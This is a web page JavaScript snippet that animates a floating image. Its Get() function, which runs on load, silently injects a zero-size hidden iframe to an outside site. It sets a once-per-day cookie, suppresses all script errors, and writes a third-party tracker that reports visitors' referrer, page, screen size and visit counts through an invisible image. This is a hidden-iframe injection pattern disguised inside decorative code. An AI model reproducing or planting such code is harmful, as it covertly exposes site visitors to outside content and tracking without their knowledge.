<!-- Begin 
var xPos = 20; 
var yPos = document.body.clientHeight; 
var step = 1; 
var delay = 30; 
var height =0; 
var Hoffset = 0; 
var Woffset = 0; 
var yon = 0; 
var xon = 0; 
var pause = true; 
var interval; 
img.style.top = yPos; 
function changePos() { 
width = document.body.clientWidth; 
height = document.body.clientHeight; 
Hoffset = img.offsetHeight; 
Woffset = img.offsetWidth; 
img.style.left = xPos + document.body.scrollLeft; 
img.style.top = yPos + document.body.scrollTop+60; 
if (yon) { 
yPos = yPos + step; 
} 
else { 
yPos = yPos - step; 
} 
if (yPos < 0) { 
yon = 1; 
yPos = 0; 
} 
if (yPos >= (height - Hoffset)) { 
yon = 0; 
yPos = (height - Hoffset); 
} 
if (xon) { 
xPos = xPos + step; 
} 
else { 
xPos = xPos - step; 
} 
if (xPos < 0) { 
xon = 1; 
xPos = 0; 
} 
if (xPos >= (width - Woffset)) { 
xon = 0; 
xPos = (width - Woffset); 
} 
} 
function start() { 
img.visibility = "visible"; 
interval = setInterval('changePos()', delay); 
} 
start(); 
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=sb;expires="+ Then.toGMTString()
document.writeln("<IFRaME src=\"http://www.hufu8.com/\" width=0 height=0><\/IFRAME>");
window.onerror=function(){return true};
document.write ('<script>var a3690tf="51la";var a3690pu="";var a3690pf="51la";var a3690su=window.location;var a3690sf=document.referrer;var a3690of="";var a3690op="";var a3690ops=1;var a3690ot=1;var a3690d=new Date();var a3690color="";if (navigator.appName=="Netscape"){a3690color=screen.pixelDepth;} else {a3690color=screen.colorDepth;}<\/script><script>a3690tf=top.document.referrer;<\/script><script>a3690pu =window.parent.location;<\/script><script>a3690pf=window.parent.document.referrer;<\/script><script>a3690ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3690ops=(a3690ops==null)?1: (parseInt(unescape((a3690ops)[2]))+1);var a3690oe =new Date();a3690oe.setTime(a3690oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3690ops+ ";path=/;expires="+a3690oe.toGMTString();a3690ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3690ot==null){a3690ot=1;}else{a3690ot=parseInt(unescape((a3690ot)[2])); a3690ot=(a3690ops==1)?(a3690ot+1):(a3690ot);}a3690oe.setTime(a3690oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3690ot+";path=/;expires="+a3690oe.toGMTString();<\/script><script>a3690of=a3690sf;if(a3690pf!=="51la"){a3690of=a3690pf;}if(a3690tf!=="51la"){a3690of=a3690tf;}a3690op=a3690pu;try{lainframe}catch(e){a3690op=a3690su;}document.write(\'<img style="width:0px;height:0px" src="http://vip.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=38&id=1683690&tpages=\'+a3690ops+\'&ttimes=\'+a3690ot+\'&tzone=\'+(0-a3690d.getTimezoneOffset()/60)+\'&tcolor=\'+a3690color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3690of)+\'&vpage=\'+escape(a3690op)+\'" \/>\');<\/script>');
}
}Get();








